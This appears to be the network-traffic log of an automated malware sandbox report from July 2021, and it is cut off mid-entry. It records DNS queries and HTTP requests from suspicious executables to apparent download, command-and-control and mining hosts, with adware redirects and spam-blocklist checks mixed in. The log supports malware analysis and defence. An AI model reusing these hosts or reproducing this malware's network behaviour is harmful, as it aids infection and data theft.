                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 180
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 56
                                                                                          Date: Fri, 09 Jul 2021 23:07:41 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: u_pl=14576783; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: ain=eyJhbGciOiJIUzI1NiJ9.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.zSzqFXOc-ReMjzaDNv_HybfTdwdxzUhLVp19wxeCfpc; expires=Fri, 09 Jul 2021 23:09:58 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 1fb8498bf941941e498591412e7f70d1
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/b1fsmdd9m?shu=27766581578b28279d1d029857cc4ea614c316466789d8a490386c4c72c420f3f5bbf23f871c939400b5ca23e0ea3379ba26abd69c0a33c8cd8669dd6727841ef49ad6fabff13718eb930977a99e8242eb735bc34dfe57a9762258ec1de866&pst=1625872198&rmtc=t&uuid=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2%3A1%3A1&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /b1fsmdd9m?shu=27766581578b28279d1d029857cc4ea614c316466789d8a490386c4c72c420f3f5bbf23f871c939400b5ca23e0ea3379ba26abd69c0a33c8cd8669dd6727841ef49ad6fabff13718eb930977a99e8242eb735bc34dfe57a9762258ec1de866&pst=1625872198&rmtc=t&uuid=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2%3A1%3A1&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          cookie: u_pl=14576783; cjs=t
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 0
                                                                                          location: https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: uid_id2=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2:1:1; expires=Fri, 16 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: iprcd22a02f2f4cdcfe5d97197accaee0144=2858388; expires=Sat, 10 Jul 2021 00:08:58 GMT
                                                                                          set-cookie: pdhtkv=true; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: uncs=1; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: pdhtkv28=true; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: uncs28=1; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: a378f2fa76d8631459c58c8f1799c144
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: image/x-icon
                                                                                          content-length: 0
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: c114cc3fb3e957e4f6a7101c6a94bab1
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          venetrigni.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          Response
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          54.227.178.166
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          52.20.18.214
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://venetrigni.com/stats
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.227.178.166:443
                                                                                          Request
                                                                                          GET /stats HTTP/2.0
                                                                                          host: venetrigni.com
                                                                                          accept: */*
                                                                                          origin: https://www.profitabletrustednetwork.com
                                                                                          referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          content-length: 40
                                                                                          server: fasthttp
                                                                                          access-control-allow-origin: https://www.profitabletrustednetwork.com
                                                                                          access-control-allow-credentials: true
                                                                                          set-cookie: uid_id2=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2:1:1; expires=Mon, 07 Jul 2031 23:08:58 GMT; secure; SameSite=None
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          typiccor.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          typiccor.com
                                                                                          IN A
                                                                                          Response
                                                                                          typiccor.com
                                                                                          IN A
                                                                                          54.225.64.149
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.225.64.149:443
                                                                                          Request
                                                                                          GET /kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: typiccor.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:08:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: session=KuTk8-aSLdIvAVgYahC7891_hEuoSwPq
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://typiccor.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.225.64.149:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: typiccor.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Date: Fri, 09 Jul 2021 23:08:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 552
                                                                                          Connection: keep-alive
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.microsoft.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.microsoft.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.microsoft.com
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          IN CNAME
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          IN A
                                                                                          80.67.94.7
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.microsoft.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.microsoft.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.microsoft.com
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          IN CNAME
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          IN A
                                                                                          104.85.1.163
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.bing.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.bing.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.bing.com
                                                                                          IN CNAME
                                                                                          a-0001.a-afdentry.net.trafficmanager.net
                                                                                          a-0001.a-afdentry.net.trafficmanager.net
                                                                                          IN CNAME
                                                                                          www-bing-com.dual-a-0001.a-msedge.net
                                                                                          www-bing-com.dual-a-0001.a-msedge.net
                                                                                          IN CNAME
                                                                                          dual-a-0001.a-msedge.net
                                                                                          dual-a-0001.a-msedge.net
                                                                                          IN A
                                                                                          204.79.197.200
                                                                                          dual-a-0001.a-msedge.net
                                                                                          IN A
                                                                                          13.107.21.200
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          204.79.197.200:443
                                                                                          Request
                                                                                          GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
                                                                                          host: www.bing.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 404
                                                                                          cache-control: private
                                                                                          content-length: 39491
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-encoding: br
                                                                                          vary: Accept-Encoding
                                                                                          p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                          set-cookie: MUID=1798923AF38167B203798255F20566B0; domain=.bing.com; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: MUIDB=1798923AF38167B203798255F20566B0; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; HttpOnly
                                                                                          set-cookie: _EDGE_S=F=1&SID=264617ADCBE763B90D3D07C2CA636210&mkt=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                          set-cookie: _EDGE_V=1; domain=.bing.com; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; HttpOnly
                                                                                          set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHUID=V=2&GUID=F3F98C53DD4A43A2B25F7BD63B050036&dmnchg=1; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHUSR=DOB=20210709; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: _SS=SID=264617ADCBE763B90D3D07C2CA636210; domain=.bing.com; path=/
                                                                                          x-snr-routing: 1
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-error-page: 404-custom
                                                                                          x-ua-compatible: IE=edge
                                                                                          x-cache: CONFIG_NOCACHE
                                                                                          x-msedge-ref: Ref A: F4C67CDC77C241F2A131891FBE589503 Ref B: AMBEDGE0817 Ref C: 2021-07-09T23:10:02Z
                                                                                          date: Fri, 09 Jul 2021 23:10:02 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          fastpool.xyz
                                                                                          -a
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          fastpool.xyz
                                                                                          IN A
                                                                                          Response
                                                                                          fastpool.xyz
                                                                                          IN A
                                                                                          213.91.128.133
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2197
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=dKWmqKuuahKZLYBDbtFFjO8FIGhEhbbdFnO4C5y-opBna32l6Ug9FwSuXWos1kQc3iq0stbzENbPAoPZxYqhq7Jvz9EfNC-jUa9eZst6p74sZPrctxUc8IjWrackykOMXlIZssdpZ4Jut4JLzgqFNl_m2jtyuCUvg65n_afsGv4; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2197
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=dQQZRUCWwz1kaFkfPeoYAZnqBebvqoxmnDQ6zxkBlyutsdLo5D0hqj68I-lrqZDl1c3CZ9ZjtgZghY6WlQbUCdPgBXc6F4PLc5cb7CuRnDf3X4RA4-50i68Ydf0cY6-9Y2LUCJIeJQywP1j_lM_-JMSCmXZjdGllja0nF_uqR2E; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2202
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=nunqpKZ_ZON92iMZHyQCVMwEbeEh-8gf4f3eVY1vx2s8b77FZ3xo-LnqpBjUqtztk41wuserels_FqClymM7F8rQKnvDndgm_xQ3bMV3FEiLXxOrknD6u74U-nJQlLCTFCpyNeieGrwrBoqG-5e4g6n2eRZD4DrQtERIZuY0N2o; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2198
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=kanAiYhvbObt5mp8fWN5Y2-3Iaw-rqQwcqyFGjS52j32gPXn6qodSRyz6Qe1EfdpZhtfPwYLHi98IRoXMGPiMHCWpkOVrYLpaZsOpTBKL3RONUIeaYIZcVdF4nA0ZzqhOQeg0VEQqmLvxXk0icVz24spMW0Al5raSLp62vyopAs; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2196
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=R-qPwdW4qkiDLIbPmQj0JsoJNZn83Cp0JqbM0E0a7Kf9DrUhEpgBWTfr6gTr-qNkUn2z7D3mPgd9HFG6NxGQSm7cmzFXwWxF9zMGhfe069zuYQlLyY36uOK86DdD1QjSnbLHqASjdm5WCsq8hTn3i-WsG67WVJXUYEGjMhiOg9k; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2201
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=QBq6NgPF9jb3JNSr_fUqnB2H2dSS7myeYwm5i1bLgOAgeoC1rS2hZetqpQC1gRwjiTwG9UBzmJAv9PZwc3vE4MyKgYsrv_CwzD3Y3CDkhNIB5lz6g2DbPs40kRgpjh-xVnoUwAnr6ErSd_Yx72trPq2D5WeCIyOGSFvHueHCE1k; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          i.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
